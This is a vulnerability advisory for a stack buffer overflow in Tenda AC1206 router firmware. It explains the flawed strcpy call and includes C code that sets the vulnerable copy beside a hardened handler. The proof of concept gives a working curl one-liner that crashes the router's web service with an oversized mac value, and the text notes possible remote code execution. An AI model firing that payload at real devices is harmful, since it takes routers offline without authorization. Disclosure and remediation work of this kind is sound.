@win3zz
Created August 27, 2025 13:15
CVE-2025-9523 - Stack-Based Buffer Overflow in Tenda Wi-Fi 5 Router AC1206

  • Discovered by: xxricardoxkk ([email protected])
  • Vendor: Shenzhen Jixiang Tenda Technology Co., Ltd.
  • Affected Version: AC1206V1.0RTL_V15.03.06.23
  • Severity: High (unauthenticated DoS, potential RCE risk).

Summary

A stack-based buffer overflow vulnerability exists in the Tenda Wi-Fi 5 Router AC1206 running firmware AC1206V1.0RTL_V15.03.06.23. The issue lies in the /goform/GetParentControlInfo endpoint, where the mac parameter is copied into a fixed-size stack buffer using strcpy() without boundary checks.

This flaw allows unauthenticated remote attackers to send a crafted payload and cause a Denial of Service (DoS) by crashing the device’s web service.

Vulnerability Details

The vulnerable function call chain is:

main → initWebs → formDefineTendDa → GetParentControlInfo
  • The endpoint retrieves the mac parameter.

  • Inside GetParentControlInfo, the function:

    strcpy(pc_info->mac_addr, mac_addr);

    copies the attacker-controlled mac value directly into a fixed-size, 596-byte stack buffer (the parent_control_info struct) with no length check.

A mac value longer than the 596-byte buffer overwrites adjacent data in the stack frame, corrupting memory and crashing the web server process.
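The pattern described above, shown as an added example next to a hardened form of the same handler. This is illustration code written for this page, not code from the advisory or from Tenda's firmware: the struct layout (mac_addr assumed to be the first field), the function names vulnerable_copy, parse_mac_param and hardened_get_parent_control_info, and the 596-byte size taken from the advisory are all assumptions. The hardened version rejects the request unless the parameter is exactly a 17-character colon-separated MAC address, so no copy ever exceeds the field.

```c
/*
 * Added example (not from the advisory or the vendor's firmware): a model of the
 * strcpy() pattern reported for GetParentControlInfo beside a hardened handler.
 * Struct layout, names and the 596-byte size are assumptions based on the advisory.
 */
#include <stdio.h>
#include <string.h>
#include <ctype.h>

#define PC_INFO_SIZE 596   /* struct size quoted in the advisory */
#define MAC_STR_LEN  17    /* strlen("aa:bb:cc:dd:ee:ff") */

typedef struct {
    char mac_addr[MAC_STR_LEN + 1];                /* assumed first field */
    char other[PC_INFO_SIZE - (MAC_STR_LEN + 1)];  /* pads the struct to 596 bytes */
} parent_control_info;

/* Vulnerable pattern: unbounded strcpy() of attacker-controlled data into a
 * stack-resident struct. Input longer than the field overwrites the rest of the
 * struct; input longer than the struct overwrites the surrounding stack frame. */
static void vulnerable_copy(parent_control_info *pc_info, const char *mac_addr)
{
    strcpy(pc_info->mac_addr, mac_addr);   /* no length check, as in the report */
}

/* Bounded length: reads at most limit+1 bytes, so a huge or unterminated input
 * cannot make the check itself unsafe. Returns limit+1 if the string is longer. */
static size_t bounded_len(const char *s, size_t limit)
{
    size_t n = 0;
    while (n <= limit && s[n] != '\0') n++;
    return n;
}

static int hexval(int c)
{
    if (c >= '0' && c <= '9') return c - '0';
    c = tolower(c);
    return c - 'a' + 10;
}

/* Strict parser for the mac parameter: exactly 17 characters of the form
 * xx:xx:xx:xx:xx:xx. On success copies the text into out (18 bytes), decodes the
 * six octets into raw and returns 1; any other input is rejected with 0. */
static int parse_mac_param(const char *mac, char out[MAC_STR_LEN + 1], unsigned char raw[6])
{
    if (mac == NULL || bounded_len(mac, MAC_STR_LEN) != MAC_STR_LEN)
        return 0;
    for (int i = 0; i < MAC_STR_LEN; i++) {
        if (i % 3 == 2) {
            if (mac[i] != ':') return 0;
        } else if (!isxdigit((unsigned char)mac[i])) {
            return 0;
        }
    }
    for (int i = 0; i < 6; i++)
        raw[i] = (unsigned char)((hexval(mac[3 * i]) << 4) | hexval(mac[3 * i + 1]));
    memcpy(out, mac, MAC_STR_LEN);
    out[MAC_STR_LEN] = '\0';
    return 1;
}

/* Hardened handler: validate before copying. Returns 0 on success and -1 when the
 * request should be refused (HTTP 400), so nothing oversized reaches the struct. */
static int hardened_get_parent_control_info(const char *mac_param)
{
    parent_control_info pc_info;
    unsigned char raw[6];
    memset(&pc_info, 0, sizeof pc_info);
    if (!parse_mac_param(mac_param, pc_info.mac_addr, raw))
        return -1;
    (void)raw;   /* the lookup keyed on the six octets would follow here */
    return 0;
}

int main(void)
{
    parent_control_info pc_info;
    char oversized[PC_INFO_SIZE + 100];   /* constructed input longer than the whole struct */
    memset(oversized, 'A', sizeof oversized - 1);
    oversized[sizeof oversized - 1] = '\0';

    /* Safe only because this input is short; called with `oversized` it would smash the stack. */
    vulnerable_copy(&pc_info, "aa:bb:cc:dd:ee:ff");
    printf("vulnerable_copy stored: %s\n", pc_info.mac_addr);

    printf("hardened, valid MAC:  %d\n", hardened_get_parent_control_info("aa:bb:cc:dd:ee:ff"));
    printf("hardened, oversized:  %d\n", hardened_get_parent_control_info(oversized));
    printf("hardened, bad format: %d\n", hardened_get_parent_control_info("aa-bb-cc-dd-ee-ff"));
    return 0;
}
```

The length check is done with a bounded scan rather than strlen() so that the check itself never walks an attacker-sized string, and the format check runs before any byte is copied; a bounded copy alone (strncpy into the field) would stop the overflow but still accept garbage, which is why the handler validates the value as a MAC address first.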

Proof of Concept (PoC)

Steps to Reproduce

  1. Host the vulnerable firmware with QEMU or use a physical AC1206 device.
  2. Run the following command (example using curl):

     for i in {1..4}; do curl -G --data-urlencode "mac=$(python3 -c 'print("A"*512000 + "\xef\xbe\xad\xde")')" "http://<ROUTER_IP>/goform/GetParentControlInfo"; done

     Note that under python3 the \xef\xbe\xad\xde escapes are emitted as UTF-8-encoded code points rather than the raw bytes 0xde 0xad 0xbe 0xef, and print() appends a newline that curl URL-encodes; neither matters for the DoS, where only the length of the payload is relevant.
  3. The router's web service crashes and stops answering requests, confirming DoS via stack overflow.

Impact

  • Denial of Service (DoS): The device’s HTTP service crashes, requiring a manual reboot.
  • Potential for RCE: While only DoS was demonstrated, stack-based overflows may be further exploited to achieve remote code execution (RCE) depending on system protections (ASLR, NX, etc.).

Recommendations

  • Validate the mac parameter before use: a MAC address is exactly 17 characters (six hex octets separated by colons), so anything longer or differently formatted should be rejected before any copy takes place.
  • Replace unsafe functions like strcpy() with bounded alternatives (snprintf, strlcpy, or memcpy with an explicit length check); note that strncpy alone does not guarantee NUL termination and should not be treated as a complete fix.
  • Release patched firmware to affected devices.

Warning

This report and provided proof of concept are for research and educational purposes only. Do not use this exploit on devices without explicit authorization. Testing on production systems may cause service disruption and violate legal/ethical boundaries.
